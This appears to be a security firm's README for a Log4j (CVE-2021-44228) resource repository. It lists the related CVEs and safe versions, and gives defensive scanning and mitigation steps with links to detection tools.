/log4j

Repo containing all info, scripts, etc. related to CVE-2021-44228

CVE-2021-44228 a.k.a. LOG4J

This is a public repository from Wortell containing information, links, files and other items related to vulnerabilities related to Log4j

Due to vulnerabilities in log4j 2.17.0 it is now recommended to patch to version 2.17.1

Knows CVEs

CVE Score Description
CVE-2021-44228 10.0 A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
CVE-2021-45046 9.0 An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
CVE-2021-45105 7.5 A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
CVE-2021-44832 6.6 A Remote code execution vulnerability affecting Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4)

log4j-wortell-octo-ninja

1. Scanning

Here are a few options to try and find applications that use Log4j and could potentially be abused:

2. Indicators of Compromise

Florian Roth also posted a great YARA rule: https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar

3. Vulerable Applications

4. Information

anatomy_log4j

5. Samples

6. Patches

7. Mitigation Guide

! IMPORTANT ! Exploits are continously developed. Aways make sure to work with the latest version of scanners. It is verified that scanners used below take into account that version 2.17.1 of log4j is recommended.

  1. Identify potential vulnerable devices by using https://github.com/NCSC-NL/log4shell/blob/main/software/README.md - This a time consuming task, but you need to do it anyway, so better start quickly!

  2. Run a scan to check for vulnerable java applications/dependancies using: https://github.com/dtact/divd-2021-00038--log4j-scanner with command divd-2021-00038--log4j-scanner.exe {target-path} and watch for files that have been classified as vulnerable.

Version Classification
2.12.4 Safe
2.17.1 Safe
2.3.2 Safe
2.16.0 Okay
2.15.0 Okay
< 2.15.0 Vulnerable
  1. Run a scan to check for expoit attempts using https://github.com/Neo23x0/log4shell-detector python3 log4shell-detector.py -p c:\ and watch for exploitation attempts.

8. Wortell blogs

Here are Wortell specialists blogging about LOG4J:

tvm

reverse_engineering